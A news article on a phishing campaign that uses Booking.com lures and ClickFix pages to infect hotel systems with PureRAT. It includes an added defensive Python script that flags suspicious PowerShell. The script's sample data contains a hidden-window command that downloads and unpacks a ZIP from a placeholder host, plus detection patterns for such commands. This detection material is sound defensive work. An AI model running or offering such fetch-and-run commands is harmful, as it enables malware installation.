
Cybersecurity researchers have raised an alarm over a large-scale phishing campaign targeting the global hospitality industry, with hotel managers being tricked into visiting ClickFix-style phishing pages designed to steal their credentials and install the PureRAT malware.
According to Sekoia, the French cybersecurity firm that analyzed the operation, “The attacker’s modus operandi involved using a compromised email account to send malicious messages to multiple hotel establishments. This campaign leverages spear-phishing emails that impersonate Booking.com to redirect victims to malicious websites, employing the ClickFix social engineering tactic to deploy PureRAT.”
The campaign’s primary objective is to harvest credentials from compromised systems, granting threat actors unauthorized access to platforms such as Booking.com and Expedia. These stolen credentials are later sold on cybercrime forums or used to impersonate hotels and defraud guests through fake reservation or payment verification messages.
Sekoia reported that the operation has been active since at least April 2025 and continues to target hotels across multiple countries. The phishing emails often appear to come from trusted sources, directing recipients to fake reCAPTCHA verification pages that lead to malicious scripts. These scripts then prompt victims to run PowerShell commands that download a ZIP archive containing PureRAT (also known as zgRAT), which is launched via DLL side-loading.
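For defenders, the paste-and-run step described above leaves a recognisable trace in process-creation logs. The sketch below is an added example, not code from Sekoia or from the original article: it triages constructed process-creation events, and the field names (`host`, `parent`, `image`, `cmdline`), the signal patterns and the threshold are all assumptions of this example.

```python
import re

SHELLS = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
# Command-line signals; these patterns are this example's assumptions,
# not indicators published in the Sekoia report.
CMD_SIGNALS = {
    "hidden_window": re.compile(r"-w(in(dowstyle)?)?\s+(h(idden)?|1)\b", re.I),
    "web_fetch": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|"
                            r"downloadfile|downloadstring|start-bitstransfer)\b", re.I),
    "zip_payload": re.compile(r"\.zip\b|expand-archive", re.I),
    "encoded_command": re.compile(r"\s-e(nc(odedcommand)?)?\s", re.I),
}

# Constructed sample events (hosts, paths and URL are made up for illustration).
EVENTS = [
    {"host": "FRONTDESK-01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr https://example.invalid/pkg.zip '
                r'-OutFile $env:TEMP\pkg.zip; Expand-Archive $env:TEMP\pkg.zip"'},
    {"host": "BACKOFFICE-02", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\backup.ps1 -Dest D:\backup.zip"},
    {"host": "RECEPTION-03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
    {"host": "RECEPTION-03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe https://example.invalid/report.zip"},
]

def signals(event):
    """Return the names of the signals one process-creation event matches."""
    if not SHELLS.search(event["image"]):
        return []
    hits = [name for name, rx in CMD_SIGNALS.items() if rx.search(event["cmdline"])]
    # Commands typed or pasted into the Run dialog start with explorer.exe as parent.
    if event["parent"].lower().endswith("\\explorer.exe"):
        hits.append("parent_explorer")
    return hits

def triage(events, threshold=3):
    """Map host -> sorted signal names for events that meet the threshold."""
    flagged = {}
    for ev in events:
        hits = signals(ev)
        if len(hits) >= threshold:
            flagged[ev["host"]] = sorted(hits)
    return flagged

if __name__ == "__main__":
    for host, hits in triage(EVENTS).items():
        print(host, hits)
```

No single signal is conclusive on its own (scheduled backup scripts touch ZIP files, and users open PowerShell from Explorer), which is why the sketch requires several to coincide before flagging a host.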
Once deployed, PureRAT enables remote access, keylogging, webcam and microphone capture, file exfiltration, and command execution. The malware is protected with .NET Reactor, making reverse engineering difficult, and maintains persistence using Windows registry keys.
Adding to the threat, attackers also contact hotel customers directly via WhatsApp or email, using real booking details to trick them into sharing bank card information on fake Booking.com or Expedia pages.
Sekoia noted that the attackers are sourcing admin data from criminal forums like LolzTeam, even hiring intermediaries, or “traffers,” to infect hotel systems. “Booking.com extranet accounts play a crucial role in fraudulent schemes targeting the hospitality industry,” Sekoia said. “Consequently, data harvested from these accounts has become a lucrative commodity, regularly offered for sale in illicit marketplaces.”
The firm also found evidence of Telegram bots and a threat actor named “moderator_booking” selling booking platform logs.
Further analysis by Push Security revealed that recent ClickFix phishing pages have evolved, now including embedded videos, countdown timers, and OS-specific instructions, significantly boosting their credibility. “ClickFix pages are becoming increasingly sophisticated, making it more likely that victims will fall for the social engineering,” Push Security warned.
The findings highlight how cybercriminals are professionalizing phishing campaigns through “as-a-service” models—reducing entry barriers and maximizing profits from stolen hospitality data.




